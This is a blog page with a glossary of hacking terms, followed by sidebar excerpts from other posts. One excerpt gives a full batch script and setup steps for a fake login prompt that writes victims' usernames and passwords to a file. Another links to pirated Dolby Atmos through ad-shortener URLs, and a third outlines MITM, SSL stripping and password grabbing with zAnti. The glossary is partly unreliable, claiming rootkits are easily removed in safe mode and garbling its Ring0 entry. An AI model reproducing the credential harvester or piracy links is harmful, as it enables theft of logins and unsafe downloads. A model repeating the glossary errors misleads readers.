Skip to main content

Points on hacking

So after a long time these are the  common terms used in the hacker community. These definitions are a must to a wanna be ethical hacker and helps a lot for a programming enthusiast.

Common Terms Of Hacking World:

1#DDoS: DDoS  means Distributed Denial of Service. This is a type of DOS attack in which multiple compromised systems are used and these systems are often infected with a Trojan. All these infected systems select a target and cause a Denial of Service (DoS) attack.

2# VPS: It stands for Virtual private server (VPS) . It is a virtual machine that is sold as a service by an Internet hosting service. A VPS generally runs its own copy of an operating system, and the customers have superuser-level access to that operating system instance, so they can install almost any software that runs on that OS.

3# SE: Social engineering is an attack vector that relies heavily on human interaction and often involves tricking people into breaking normal security procedures.

4# HTTP: The Hypertext Transfer Protocol (HTTP) is an application protocol for  collaborative, distributed, hypermedia information systems. HTTP is the basis of data communication for the World Wide Web. The part  Hypertext is a structured text that makes use of logical links (hyperlinks) between nodes containing text.

5# SSH: Secure Shell( SSH)  is a cryptographic i.e, encrypted network protocol that operates at layer 7 of the OSI Model. It allows remote login and other network services to operate in a secure way over an unsecured network. In simple words, SSH is used to connect with Virtual Private Servers.

6# FTP: The FTP or File Transfer Protocol is a standard network protocol that is used to transfer files between a client and server using a computer network.

7# XSS (CSS): Cross-site scripting or XSS is a type of computer security vulnerability usually found in web applications. This vulnerability allows hackers to inject client-side script into web pages which are viewed by other users.

8# Script Kiddie: A Skiddie or Script Kiddie is an unskilled individual who uses programs or scripts developed by other hackers to attack networks and computer systems even to deface websites.

8# VPN: A Virtual Private Network or VPN helps in extending a private network across a public network, such as Internet. It allows the users to send and receive data across public or shared networks just like their computing devices are directly connected to the private network. Hence this benefit from the security, functionality and management policies of the private network.

10# Nix: Nix is a very powerful package manager for Linux and other Unix based systems that make package management reproducible and reliable. It provides side-by-side installation of multiple versions of a package, atomic upgrades and rollbacks,  easy setup of build environments and multi-user package management.

11# SQL:  Structured Query Language or SQL is a special-purpose programming language designed for managing data contained in a relational database management system (RDBMS), or even for stream processing in a relational data stream management system or RDSMS.

12# FUD: Fully undetectable or FUD in short, can stand for data that had been encrypted, making it appear to be random noise. This term is used in hacker circles to refer something as a clean software to many anti-viruses but still contain some kind  of hacking tool inside it.

13# LOIC/HOIC: The Low Orbit /High Orbit Ion Cannon, often abbreviated to LOIC/HOIC. It is an open source denial-of-service attack and network stress testing application written in BASIC and is designed to attack as many as 256 URLs at a time.

14# Trojan: A Trojan or Trojan horse is a type of malware that disguises itself as a legitimate software. these Trojans can be employed by hackers and cyber-thieves trying to gain access to users’ systems. Users are typically tricked  into loading and executing Trojans on their systems.

15# Botnet: A botnet (also known as a zombie army) is a number of Internet computers that, although their owners are unaware of it, have been set up to forward transmissions (including spam or viruses) to other computers on the Internet.

16# SQL Injection: SQL injection is a famous code injection technique, commonly to attack data-driven applications.In this attack, malicious SQL statements are inserted into an entry field for execution.

17# Root: Root is the Highest permission level on a computer that allows the user to modify anything on the system without a  single restriction.

18# Warez: Warez is copyrighted works distributed without fees or royalties, and may be traded, in general, violation of copyright law. Warez are generally unauthorized releases by organized groups, as opposed to file sharing between friends or large groups of people with similar interest using a darknet. Warez are not usually commercial software counterfeiting.

19# White Hat Hacker: A white hat hacker is a computer security specialist ( ethical hacker ) who breaks into secured systems and networks to test and assess their level of security. These are the good guys in the hacking community and use their skills and knowledge to to improve security by exposing vulnerabilities before a malicious hacker (also known as black hat hackers) detects and exploits them.

20# Black Hat Hacker: A black hat hacker is an individual with very good computer knowledge and with a sole purpose to bypass or breach internet security for malicious reasons. Black hat hackers are also known as dark-side hackers or crackers. These are the guys with whom White hat hackers have to fight all the time.

21# Grey Hat Hacker: The term Grey Hat hacker refers to a computer hacker or computer security expert who sometimes violate laws or typical ethical standards, for personal purposes but don’t have the malicious intentions like a typical black hat hacker.

22# Rootkit: A rootkit is a clandestine computer program designed to provide continued privileged access to a computer while actively hiding its presence. The term rootkit is a connection of the two words “root” and “kit”. This kind of virus can be easily removed by booting the computer in safe mode.

23# Ring0: Very hard to remove and very rare in the wild, these can require you to format, it’s very hard to remove certain ring0 rootkits without safe mode.

24# IP Grabber: IP Grabber is a link that grabs victim’s IP when they visit it the particular web address.

25# Malware: ‘Malware’ is an umbrella term used to refer to a variety of forms of hostile or intrusive software, including computer viruses, worms, trojan horses, ransomware, spyware, adware, scareware, and other malicious programs. It can take the form of executable code, scripts, active content, and other software.

26# Phreak: Phreak is a slang term coined to describe the activity of a culture of people who  experiment with, explore, or study, telecommunication systems. Phreaker, phreak, or phone phreak are names commonly for and by individuals who participate in phreaking.

27# DOX: Doxing or doxxing, is the Internet-based practice of researching and broadcasting personally identifiable information about an individual. The methods employed to acquire this information include searching publicly available databases and social media websites (like Facebook), hacking, and social engineering. It is closely related to internet vigilantism and hacktivism. Doxing may be carried out for various reasons, including to aid law enforcement, business analysis, extortion, coercion, harassment, online shaming and vigilante justice.

28# Worm: A computer worm is a standalone malware computer program that replicates itself in order to spread to other computers. Often, it uses a computer network to spread itself, relying on security failures on the target computer to access it. Unlike a computer virus, it does not need to attach itself to an existing program.

29# Deface: A website deface is an attack on a site that changes the appearance of the site or a certain web page or technically when a hacker replaces the index file with their own one.

30# Keylogger: Keylogger is a computer program that records every keystroke made by a computer user, especially in order to gain fraudulent access to passwords and other confidential information.

31# RAT: A remote administration tool (RAT) is a piece of software that allows a remote “operator” to control a system as if he has physical access to that system. While desktop sharing and remote administration have many legal uses, “RAT” software is usually associated with criminal or malicious activity.

source: Hackagon.

Did you like the article on hacker terms ? Please share it with your friends and let them know this information.

If you happen to find any mistakes n the article, comment below. I will be happy to address them.

Comments

Popular posts from this blog

Create a key logger using cmd

Here is a basic  keylogger  script for beginners to understand the basics of how keylogging works in notepad. This script should be used for research purposes only. @echo off color a title Login cls echo Please Enter Email Adress And Password echo. echo. cd "C:Logs" set /p user=Username: set /p pass=Password: echo Username="%user%" Password="%pass%" >> Log.txt start >>Program Here<< exit Step 1:  Now paste the above code into Notepad and save it as a  Logger.bat  file. Step 2:  Make a new folder on the desktop and name it Logs ( If the folder is not called Logs, then it will not work.) Step 3:  Drag that folder in to the  C: Step 4:  Test out the  Logger.bat ! Related  All-in-one Messenger - FacebookMessenger, WhatsApp, Skype and many more in one window Step 5:  Alright, now once you test it, you will go back into the Logs folder in the  C: and a  .txt  file will be in there, [if you make a second entry, the

get dolby atmos free on your PC

Welcome to my blog today i am here with very important item for your DDOOLLBBYY Atmos Everyone  or (at least geeks) knows  about the power of Dolby atmos we used to know that dolby atmos was only available for select PC only well not anymore from this link you can get in any pc note:  after installing dolby atmos install dolby access from https://dw27.malavida.com/dwn/8bdf73315506600b39e53dedb7616c896cc3811b629894bbe0bc994820b8af75/DolbyAccess.appx    and son't update from window store ..    just don't update it links http://gestyy.com/w2mDPI for dolby atmos   http://gestyy.com/w2mDKi  for device  driver ' http://gestyy.com/w2mDCF   for dolby atmos for gaming http://gestyy.com/w2mDN7    for dolby gaming driver if you  have any question feel free to comment

use zantu on android

Zanti 2 is a android application which is made up for network penetration testing. What Zanti 2 can do? Scan the whole network show alive host in the network scan port through Nmap for port Scanning Scan Service on each port and find vulnerability. Perform Brute force Attack Perform Shell Shock etc Vulnerability MITM : Man In The Middle Attack Session Hijackings SSL Striping Sniffing Packets Replace Image Redirect URL and IP Intercept and modified live download. Disclaimer –  I recommend that you test this tutorial on a system that belongs to YOU.   For Demonstration : Before  install Zanti your Phone must be rooted  .. In case your phone is not rooted search in the site you will find how to root android its very easy. I used Zanti in my android device and Scan the network. I choose the Mac OSx Machine which was my laptop. After that start The MITM on and SSL strip to grab some packets and try to grab the password of that machine. in the end i successfully travel the